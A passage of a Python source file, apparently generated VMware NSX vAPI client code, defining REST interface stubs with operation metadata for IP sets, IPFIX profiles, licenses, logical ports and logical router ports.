            query_parameters={},
            content_type='application/json')

        # ---- list operation ----
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ip-sets',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json')

        # ---- update operation ----
        update_input_type = type.StructType('operation-input', {
            'ip_set_id': type.StringType(),
            'ip_set': ipset_ref(),
        })
        update_error_dict = std_errors()
        update_input_value_validator_list = []
        update_output_validator_list = []
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ip-sets/{ip-set-id}',
            request_body_parameter='ip_set',
            path_variables={'ip_set_id': 'ip-set-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': ipset_ref(),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'create_0': {
                'input_type': create_0_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPAddressElement'),
                'errors': create_0_error_dict,
                'input_value_validator_list': create_0_input_value_validator_list,
                'output_validator_list': create_0_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': ipset_ref(),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPSetListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': ipset_ref(),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'create_0': create_0_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ip_sets',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _IpfixCollectorProfilesStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.ipfix_collector_profiles interface.

    Provides create/delete/get/list/update over the
    /api/v1/ipfix-collector-profiles REST endpoints.
    """
    def __init__(self, config):
        # Shared five-entry error map declared by every operation here.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        def profile_ref():
            return type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfile')

        # ---- create operation ----
        create_input_type = type.StructType('operation-input', {
            'ipfix_collector_upm_profile': profile_ref(),
        })
        create_error_dict = std_errors()
        create_input_value_validator_list = []
        create_output_validator_list = []
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ipfix-collector-profiles',
            request_body_parameter='ipfix_collector_upm_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # ---- delete operation ----
        delete_input_type = type.StructType('operation-input', {
            'ipfix_collector_profile_id': type.StringType(),
        })
        delete_error_dict = std_errors()
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ipfix-collector-profiles/{ipfix-collector-profile-id}',
            path_variables={'ipfix_collector_profile_id': 'ipfix-collector-profile-id'},
            query_parameters={},
            content_type='application/json')

        # ---- get operation ----
        get_input_type = type.StructType('operation-input', {
            'ipfix_collector_profile_id': type.StringType(),
        })
        get_error_dict = std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ipfix-collector-profiles/{ipfix-collector-profile-id}',
            path_variables={'ipfix_collector_profile_id': 'ipfix-collector-profile-id'},
            query_parameters={},
            content_type='application/json')

        # ---- list operation ----
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'profile_types': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ipfix-collector-profiles',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'profile_types': 'profile_types',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json')

        # ---- update operation ----
        update_input_type = type.StructType('operation-input', {
            'ipfix_collector_profile_id': type.StringType(),
            'ipfix_collector_upm_profile': profile_ref(),
        })
        update_error_dict = std_errors()
        update_input_value_validator_list = []
        update_output_validator_list = []
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ipfix-collector-profiles/{ipfix-collector-profile-id}',
            request_body_parameter='ipfix_collector_upm_profile',
            path_variables={'ipfix_collector_profile_id': 'ipfix-collector-profile-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': profile_ref(),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': profile_ref(),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfileListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': profile_ref(),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ipfix_collector_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _IpfixObsPointsStub(ApiInterfaceStub):
    def __init__(self, config):
        """Client-side stub for com.vmware.nsx.ipfix_obs_points (list only)."""
        # -- metadata for the list operation ---------------------------------
        list_input_type = type.StructType('operation-input', {})
        # Standard vAPI errors this operation may report.
        list_error_dict = {}
        for err_id, err_binding in (
                ('com.vmware.vapi.std.errors.service_unavailable', 'ServiceUnavailable'),
                ('com.vmware.vapi.std.errors.invalid_request', 'InvalidRequest'),
                ('com.vmware.vapi.std.errors.internal_server_error', 'InternalServerError'),
                ('com.vmware.vapi.std.errors.unauthorized', 'Unauthorized'),
                ('com.vmware.vapi.std.errors.not_found', 'NotFound')):
            list_error_dict[err_id] = type.ReferenceType(
                'com.vmware.vapi.std.errors_client', err_binding)
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ipfix-obs-points',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )
        operations = {
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixObsPointsListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {'list': list_rest_metadata}
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ipfix_obs_points',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _IpfixProfilesStub(ApiInterfaceStub):
    def __init__(self, config):
        """Client-side stub for com.vmware.nsx.ipfix_profiles (create/delete/get/list/update)."""
        def _default_errors():
            # Every operation on this interface reports the same five standard
            # vAPI errors; build a fresh mapping per operation so each entry
            # owns independent ReferenceType instances (as the generated
            # per-operation literals did).
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'ipfix_upm_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
        })
        create_error_dict = _default_errors()
        create_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        create_output_validator_list = [
            HasFieldsOfValidator()
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ipfix-profiles',
            request_body_parameter='ipfix_upm_profile',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'ipfix_profile_id': type.StringType(),
        })
        delete_error_dict = _default_errors()
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ipfix-profiles/{ipfix-profile-id}',
            path_variables={
                'ipfix_profile_id': 'ipfix-profile-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'ipfix_profile_id': type.StringType(),
        })
        get_error_dict = _default_errors()
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
            HasFieldsOfValidator()
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ipfix-profiles/{ipfix-profile-id}',
            path_variables={
                'ipfix_profile_id': 'ipfix-profile-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'applied_to_entity_id': type.OptionalType(type.StringType()),
            'applied_to_entity_type': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'profile_types': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _default_errors()
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
            HasFieldsOfValidator()
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ipfix-profiles',
            path_variables={
            },
            query_parameters={
                'applied_to_entity_id': 'applied_to_entity_id',
                'applied_to_entity_type': 'applied_to_entity_type',
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'profile_types': 'profile_types',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'ipfix_profile_id': type.StringType(),
            'ipfix_upm_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
        })
        update_error_dict = _default_errors()
        update_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        update_output_validator_list = [
            HasFieldsOfValidator()
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ipfix-profiles/{ipfix-profile-id}',
            request_body_parameter='ipfix_upm_profile',
            path_variables={
                'ipfix_profile_id': 'ipfix-profile-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfileListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ipfix_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _LicensesStub(ApiInterfaceStub):
    def __init__(self, config):
        """Client-side stub for com.vmware.nsx.licenses.

        Operations: create, delete, delete_0 (POST-based delete), get,
        getlicensebykey, list, update.
        """
        def _default_errors():
            # All seven operations on this interface report the same five
            # standard vAPI errors; build a fresh mapping per operation so
            # each entry owns independent ReferenceType instances (as the
            # generated per-operation literals did).
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'license': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
        })
        create_error_dict = _default_errors()
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/licenses',
            request_body_parameter='license',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'license_key': type.StringType(),
        })
        delete_error_dict = _default_errors()
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/licenses/{license-key}',
            path_variables={
                'license_key': 'license-key',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete_0 operation (body-based delete via POST action)
        delete_0_input_type = type.StructType('operation-input', {
            'license': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
        })
        delete_0_error_dict = _default_errors()
        delete_0_input_value_validator_list = [
        ]
        delete_0_output_validator_list = [
        ]
        delete_0_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/licenses?action=delete',
            request_body_parameter='license',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {})
        get_error_dict = _default_errors()
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/license',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for getlicensebykey operation
        getlicensebykey_input_type = type.StructType('operation-input', {
            'license_key': type.StringType(),
        })
        getlicensebykey_error_dict = _default_errors()
        getlicensebykey_input_value_validator_list = [
        ]
        getlicensebykey_output_validator_list = [
        ]
        getlicensebykey_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/licenses/{license-key}',
            path_variables={
                'license_key': 'license-key',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        list_input_type = type.StructType('operation-input', {})
        list_error_dict = _default_errors()
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/licenses',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'license': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
        })
        update_error_dict = _default_errors()
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/license',
            request_body_parameter='license',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete_0': {
                'input_type': delete_0_input_type,
                'output_type': type.VoidType(),
                'errors': delete_0_error_dict,
                'input_value_validator_list': delete_0_input_value_validator_list,
                'output_validator_list': delete_0_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'getlicensebykey': {
                'input_type': getlicensebykey_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
                'errors': getlicensebykey_error_dict,
                'input_value_validator_list': getlicensebykey_input_value_validator_list,
                'output_validator_list': getlicensebykey_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LicensesListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'delete_0': delete_0_rest_metadata,
            'get': get_rest_metadata,
            'getlicensebykey': getlicensebykey_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.licenses',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _LogicalPortsStub(ApiInterfaceStub):
    def __init__(self, config):
        """Client-side stub for com.vmware.nsx.logical_ports (create/delete/get/list/update)."""
        def _default_errors():
            # Every operation on this interface reports the same five standard
            # vAPI errors; build a fresh mapping per operation so each entry
            # owns independent ReferenceType instances (as the generated
            # per-operation literals did).
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'logical_port': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
        })
        create_error_dict = _default_errors()
        create_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        create_output_validator_list = [
            HasFieldsOfValidator()
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/logical-ports',
            request_body_parameter='logical_port',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'lport_id': type.StringType(),
            'detach': type.OptionalType(type.BooleanType()),
        })
        delete_error_dict = _default_errors()
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/logical-ports/{lport-id}',
            path_variables={
                'lport_id': 'lport-id',
            },
            query_parameters={
                'detach': 'detach',
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'lport_id': type.StringType(),
        })
        get_error_dict = _default_errors()
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
            HasFieldsOfValidator()
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-ports/{lport-id}',
            path_variables={
                'lport_id': 'lport-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'attachment_id': type.OptionalType(type.StringType()),
            'attachment_type': type.OptionalType(type.StringType()),
            'bridge_cluster_id': type.OptionalType(type.StringType()),
            'container_ports_only': type.OptionalType(type.BooleanType()),
            'cursor': type.OptionalType(type.StringType()),
            'diagnostic': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'logical_switch_id': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'parent_vif_id': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'switching_profile_id': type.OptionalType(type.StringType()),
            'transport_node_id': type.OptionalType(type.StringType()),
            'transport_zone_id': type.OptionalType(type.StringType()),
        })
        list_error_dict = _default_errors()
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
            HasFieldsOfValidator()
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-ports',
            path_variables={
            },
            query_parameters={
                'attachment_id': 'attachment_id',
                'attachment_type': 'attachment_type',
                'bridge_cluster_id': 'bridge_cluster_id',
                'container_ports_only': 'container_ports_only',
                'cursor': 'cursor',
                'diagnostic': 'diagnostic',
                'included_fields': 'included_fields',
                'logical_switch_id': 'logical_switch_id',
                'page_size': 'page_size',
                'parent_vif_id': 'parent_vif_id',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
                'switching_profile_id': 'switching_profile_id',
                'transport_node_id': 'transport_node_id',
                'transport_zone_id': 'transport_zone_id',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'lport_id': type.StringType(),
            'logical_port': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
        })
        update_error_dict = _default_errors()
        update_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        update_output_validator_list = [
            HasFieldsOfValidator()
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/logical-ports/{lport-id}',
            request_body_parameter='logical_port',
            path_variables={
                'lport_id': 'lport-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPortListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.logical_ports',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _LogicalRouterPortsStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.logical_router_ports: CRUD + list over
    /api/v1/logical-router-ports."""

    def __init__(self, config):
        errors_ns = 'com.vmware.vapi.std.errors_client'
        model_ns = 'com.vmware.nsx.model_client'

        def _std_errors():
            # Every operation on this interface reports the same five
            # standard vAPI errors; return a fresh mapping per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(errors_ns, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(errors_ns, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(errors_ns, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(errors_ns, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(errors_ns, 'NotFound'),
            }

        def _port_struct():
            # LogicalRouterPort payloads travel as dynamic structs
            # validated against the LogicalRouterPort model type.
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType(model_ns, 'LogicalRouterPort')])

        def _op(input_type, output_type, input_validators, output_validators):
            # One operation descriptor in the shape ApiInterfaceStub expects.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list': input_validators,
                'output_validator_list': output_validators,
                'task_type': TaskType.NONE,
            }

        # create: POST /api/v1/logical-router-ports
        create_input_type = type.StructType('operation-input', {
            'logical_router_port': _port_struct(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/logical-router-ports',
            request_body_parameter='logical_router_port',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # delete: DELETE /api/v1/logical-router-ports/{logical-router-port-id}
